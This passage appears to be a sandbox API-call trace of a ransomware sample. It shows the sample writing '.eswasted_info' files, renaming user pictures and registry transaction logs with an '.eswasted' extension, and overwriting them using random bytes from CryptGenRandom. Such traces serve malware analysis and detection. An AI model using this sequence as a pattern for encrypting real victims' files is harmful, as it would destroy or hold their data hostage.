dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.357] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.358] SetEndOfFile (hFile=0x110) returned 1 [0080.358] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.358] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.358] lstrcpyW (in: lpString1=0x4de0d4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted")) returned 0 [0080.359] GetLastError () returned 0x20 [0080.359] CloseHandle (hObject=0x110) returned 1 [0080.359] lstrcpyW (in: lpString1=0x4de0d4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.359] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted_info")) returned 1 [0080.361] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0080.361] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.361] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.361] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.361] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DYByrvaYeTA15hXduLD1.jpg") returned 67 [0080.361] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4ddfd8 [0080.362] lstrcpyW (in: lpString1=0x4de05e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.362] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.362] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.362] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.362] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DYByrvaYeTA15hXduLD1.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dybyrvayeta15hxduld1.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.363] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.364] SetEndOfFile (hFile=0x110) returned 1 [0080.364] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.364] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.364] lstrcpyW (in: lpString1=0x4de05e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DYByrvaYeTA15hXduLD1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dybyrvayeta15hxduld1.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DYByrvaYeTA15hXduLD1.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dybyrvayeta15hxduld1.jpg.eswasted")) returned 1 [0080.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DYByrvaYeTA15hXduLD1.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dybyrvayeta15hxduld1.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.365] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.367] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.492] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0080.492] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.493] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.493] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.493] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.502] SetEndOfFile (hFile=0x110) returned 1 [0080.504] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.504] CloseHandle (hObject=0x110) returned 1 [0080.505] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0080.506] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.506] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.506] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.507] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tC7u-hoYcUu00l.jpg") returned 61 [0080.507] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4ef6d8 [0080.507] lstrcpyW (in: lpString1=0x4ef752, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.507] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.507] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.508] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.508] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tC7u-hoYcUu00l.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tc7u-hoycuu00l.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.508] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.509] SetEndOfFile (hFile=0x110) returned 1 [0080.509] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.510] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.510] lstrcpyW (in: lpString1=0x4ef752, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tC7u-hoYcUu00l.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tc7u-hoycuu00l.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tC7u-hoYcUu00l.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tc7u-hoycuu00l.jpg.eswasted")) returned 1 [0080.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tC7u-hoYcUu00l.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tc7u-hoycuu00l.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.510] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.513] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.514] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0080.514] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.514] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.515] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.515] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.523] SetEndOfFile (hFile=0x110) returned 1 [0080.571] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.571] CloseHandle (hObject=0x110) returned 1 [0080.573] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d8 | out: hHeap=0x4a0000) returned 1 [0080.573] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.574] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.574] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.574] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\8vwqILz24A.jpg") returned 65 [0080.574] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4ef6c8 [0080.574] lstrcpyW (in: lpString1=0x4ef74a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.574] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.574] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.575] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.575] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\8vwqILz24A.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\8vwqilz24a.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.576] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.577] SetEndOfFile (hFile=0x110) returned 1 [0080.577] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.577] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.577] lstrcpyW (in: lpString1=0x4ef74a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\8vwqILz24A.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\8vwqilz24a.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\8vwqILz24A.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\8vwqilz24a.jpg.eswasted")) returned 1 [0080.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\8vwqILz24A.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\8vwqilz24a.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.578] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.579] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.579] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.579] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.580] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.580] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.580] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.590] SetEndOfFile (hFile=0x110) returned 1 [0080.592] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.592] CloseHandle (hObject=0x110) returned 1 [0080.593] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c8 | out: hHeap=0x4a0000) returned 1 [0080.593] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.594] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.594] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.594] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\BTJAyWA8McHhBfsz.jpg") returned 71 [0080.594] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4ef6c8 [0080.594] lstrcpyW (in: lpString1=0x4ef756, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.594] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.594] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.595] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.595] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\BTJAyWA8McHhBfsz.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\btjaywa8mchhbfsz.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.596] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.596] SetEndOfFile (hFile=0x110) returned 1 [0080.597] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.597] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.597] lstrcpyW (in: lpString1=0x4ef756, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\BTJAyWA8McHhBfsz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\btjaywa8mchhbfsz.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\BTJAyWA8McHhBfsz.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\btjaywa8mchhbfsz.jpg.eswasted")) returned 1 [0080.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\BTJAyWA8McHhBfsz.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\btjaywa8mchhbfsz.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.598] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.598] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.599] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.599] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.599] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.600] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.600] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.608] SetEndOfFile (hFile=0x110) returned 1 [0080.610] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.610] CloseHandle (hObject=0x110) returned 1 [0080.612] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c8 | out: hHeap=0x4a0000) returned 1 [0080.612] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.612] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.613] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\OHsR.gif") returned 59 [0080.613] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x280) returned 0x4ef6c8 [0080.613] lstrcpyW (in: lpString1=0x4ef73e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.613] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.613] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.613] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.613] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\OHsR.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\ohsr.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.614] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.615] SetEndOfFile (hFile=0x110) returned 1 [0080.615] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.615] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.615] lstrcpyW (in: lpString1=0x4ef73e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\OHsR.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\ohsr.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\OHsR.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\ohsr.gif.eswasted")) returned 1 [0080.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\OHsR.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\ohsr.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.616] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.664] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.665] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.665] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.665] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.666] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.666] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.674] SetEndOfFile (hFile=0x110) returned 1 [0080.676] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.676] CloseHandle (hObject=0x110) returned 1 [0080.678] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c8 | out: hHeap=0x4a0000) returned 1 [0080.678] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.679] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.679] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\Q_GqjPD6AynM.png") returned 73 [0080.679] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29c) returned 0x4cb4e0 [0080.679] lstrcpyW (in: lpString1=0x4cb572, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.679] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.679] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.680] CryptGenRandom (in: 